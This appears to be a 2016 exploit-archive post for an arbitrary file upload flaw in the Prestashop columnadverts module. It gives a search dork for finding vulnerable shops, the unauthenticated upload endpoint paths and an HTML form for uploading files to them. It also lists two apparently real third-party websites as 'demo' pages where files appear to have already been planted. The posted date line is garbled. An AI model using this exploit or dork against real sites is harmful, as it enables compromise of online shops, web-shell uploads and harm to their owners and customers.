Prestashop columnadverts module Arbitrary File Upload
Posted on 30 November -0001
<HTML><HEAD><TITLE>Prestashop columnadverts module Arbitrary File Upload</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>############################################################## > Exploit Title: Prestashop Arbitrary File Upload > Exploit Author: HxN | facebook.com/CowoKerensTeam > Dork : inurl:"/modules/columnadverts2/" or inurl:"/modules/columnadverts/" > Website : https://www.prestashop.com/ > Date : 2016/08/21 > Tested on : Ubuntu , Win 8 ############################################################ POC : target.il/modules/columnadverts2/uploadimage.php target.il/modules/columnadverts2/uploadimage.php Vuln : "error" ############################################################## CSRF : <form method="POST" action="target.il/modules/namemodule/uploadimage.php" enctype="multipart/form-data"> <input type="file" name="userfile" /><button>Upload</button> </form> ############################################################### > DEMO : > http://www.rossoregale.com/modules/homepageadvertise2/slides/id.htm > http://orita.es/modules/homepageadvertise2/slides/id.htm ##############################################################</BODY></HTML>